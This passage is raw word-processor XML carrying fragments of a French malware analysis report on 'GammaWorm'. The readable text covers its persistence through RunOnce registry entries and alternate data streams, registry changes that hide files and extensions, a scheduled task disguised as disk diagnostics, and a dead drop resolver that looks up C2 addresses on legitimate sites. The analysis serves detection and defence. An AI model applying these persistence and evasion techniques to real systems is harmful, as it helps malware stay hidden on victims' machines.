              <wp:posOffset>3056890</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6543049</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="281939" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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93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939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281305" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="281305" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="28193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0784" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1982470</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8760469</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3030858" cy="866139"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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30858" cy="8661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30855" h="866139">
                          <a:moveTo>
                            <a:pt x="785495" y="866139"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="785495" y="666750"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3030855" y="666750"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3030855" y="866139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2245994" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2245994" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="224663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180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283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3856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955700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2610746" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0746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4.3.2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Persistance et propagation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4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1268118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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GammaWorm met en œuvre plusieurs mécanismes de persistance afin de garantir sa survie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5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1441473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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après les redémarrages du système, notamment des clés de registre et des tâches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6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1614828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="664486" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4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planifiées.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7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1889783</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1632271" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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22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4.3.2.1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle23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Clés de registre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8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2164738</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Tout d’abord, GammaWorm assure la persistance de son code en créant une entrée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2338093</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="501501" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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50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registre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1024" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6359004</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2338093</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="378228" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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82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3"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">dan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204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2530063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5672187" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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218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HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\E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307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2744100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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xplorerGuard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 qui exécutera le fichier ADS </w:t>
                        </w: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C:\Users\[USER]:GTR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(une copie complète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4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2960593</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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de GammaWorm) via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wscript.exe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. Comme cette entrée se trouve dans la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RunOnce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5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3157243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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la charge utile s'exécutera automatiquement lors de la prochaine connexion de l'utilisateur,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6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3330598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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mais elle sera supprimée immédiatement après le lancement de la commande. Cependant,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7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3503953</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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comme le nouveau GammaWorm (issu de la copie complète) est exécuté, il recrée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8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3677308</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4770409" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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040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entrée de registre, ce qui rend cette configuration effectivement permanente.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9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3952263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Ensuite, afin de masquer ses futures activités de propagation, G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ammaWorm modifie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4144233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5775819" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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581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plusieurs</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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clés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registre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situées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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="46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HKEY_USERS\[SID]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126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4359498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced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8"/>
                            <w:spacing w:val="32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7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2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4556148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3474156" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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415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modifications sont détaillées dans le tableau ci-dessous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3312" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1007745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4872378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1944462" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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44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de la valeur de la clé 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4336" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3311524</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4872378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="990483" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4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Valeur définie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5360" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5363845</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4958738</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="485695" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6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Impact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6384" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1399540</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5045733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1160745" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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74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registre modifiée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7408" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3265170</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5045733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1045054" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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50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(hexadécimale)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8432" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4550410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5396888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2151898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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1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Désactive l'affichage des fichiers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9456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5479638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="526058" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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05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Hidden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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3076574</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5479638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="280885" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8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1504" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4550410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5570243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="478569" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5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cachés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2528" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4550410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5921398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2151898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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1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Masque les fichiers protégés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3552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6004148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1261160" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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11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ShowSuperHidden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4576" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3076574</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6004148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="280885" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8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5600" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4550410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6094753</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1405220" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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52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système d'exploitation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6624" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4550410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6445908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2151263" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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12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</w:rPr>
                          <w:t xml:space="preserve">Masque les</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="10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"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> extensions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7648" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3076574</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6528658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="280885" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8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8672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6528658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="934681" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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468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HideFileExt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9696" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4550410</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6619263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1875429" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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54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pour les types connus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7210448</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Ces modifications réduisent de fait les paramètres de visibilité du système, permettant ainsi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1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7383803</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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à l'opérateur de masquer les fichiers et répertoires spécifiques nécessaires au module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2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7557158</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1913963" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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9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propagation de GammaWorm.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3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7832113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1748362" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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83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4.3.2.2</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle15"/>
                            <w:spacing w:val="12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Tâches planifiées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4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8107068</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Une fois les modifications apportées au registre effectuées, GammaWorm assure sa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5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8280423</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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persistance en créant des tâches planifiées. Chaque tâche planifiée est configurée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6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8453778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5251256" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5125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exécuter un module dissimulé dans un fichier ADS créé lors de la phase de clonage.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7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8717518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1118067" cy="190271"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8067" cy="19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9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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.3.2.2.1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Tâche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8912" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2001519</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8745443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3978171" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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817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DiskDiagnosticDataCollector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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> : configuration du réseau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9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9046868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Afin de maintenir une connexion résiliente avec le serveur C2, GammaWorm met en place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9220223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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un mécanisme de persistance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 se faisant passer pour un outil de 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maintenance du système.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1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9412193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Une tâche planifiée nommée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DiskDiagnosticDataCollector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est créée sous le chemin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30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403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505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608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710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60812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2465714</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="345440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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45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45440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45440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3454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529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2819400" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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940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940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2818765" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2818765" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="281940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7344" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6439534</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3826519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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3488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3826519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2844168" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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4168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4165" h="414020"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2328545" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2328545" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2329180" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2844165" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="284416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45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5601967</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="3550297"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="159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17">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-35" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="35502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3550297">
                          <a:moveTo>
                            <a:pt x="0" y="3550297"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="355029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355029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553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656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758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976218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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\DiskDiagnostic\Microsoft\Windows\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, configurée avec un intervalle de répétition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8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1169935</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5873527" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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352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7 minutes. Cette tâche exécute la charge utile stockée dans le fichier </w:t>
                        </w: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C:\Users\[USER]:URL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9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1349640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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ADS, qui fait partie du code </w:t>
                        </w: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pouvant être défini comme un module distinct et utilise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0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1532278</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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technique </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Dead Drop Resolver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. L’objectif principal de ce module est de récupérer et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1705633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4142038" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="15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20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maintenir une configuration réseau à jour dans la base du registre.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2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1980588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">En premier, le module démarre avec une URL codée en dur pointant vers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3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2151010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2609098" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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90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hxxps://graph[.]org/kyjfkyr-12-06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4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2435883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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graph[.]org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est un domaine miroir de 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telegra[.]ph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, un outil de publication légitime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5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2621303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1292857" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8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fourni par Telegram.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6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2896258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2829976" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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99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déroulement de l’exécution est le suivant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782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3171213</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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Récupération initiale : le code analyse le contenu HTML de la page web pour extraire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884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3344568</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1145798" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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57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nouvelle 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987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3619523</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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Stockage dans le registre : cette URL extraite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est stockée dans deux clés de regis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089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3811493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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spécifiques, situées respectivement sous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HKCU\Console\WindowsUpdates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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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4026758</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2323159" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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315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HKCU\Console\WindowsResponby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294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4328183</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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Résolution récursive : le module lit ces valeurs de registre nouvellement écrites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396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4501538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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lancer une nouvelle requête GET. Ce processus est répété cinq fois dans une boucle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499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4674893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385953" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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récursive, ce qui permet à GammaWorm de résoudre progressivement tous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601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4848248</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3831809" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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3180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domaines et chemins d’accès aux ressources dont il a besoin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7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5123203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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Les captures d’écran suivantes montrent comment les serveurs C2 sont hébergés sur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8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5296558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1184450" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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44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différentes pages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9088" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1586865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9128780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4424015" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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4015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11 – Hébergement des URLs et adresses IP des C2 sur des sites web légitimes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0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9381513</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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Ce module utilise une infrastructure hybride, combinant des services web légitimes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1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9554868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">(Telegram ou Cloudflare)</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="12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53"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> et ses</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="13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"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> propres domaines personnalisés (ici,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6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318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6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42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6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523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6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625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6603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1893579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771514" cy="565784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="16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514" cy="5657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1514" h="565784">
                          <a:moveTo>
                            <a:pt x="0" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1500505" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1500505" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="565784"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3460749" y="565784"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="565784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5771514" y="0"/>
                          </a:lnTo>
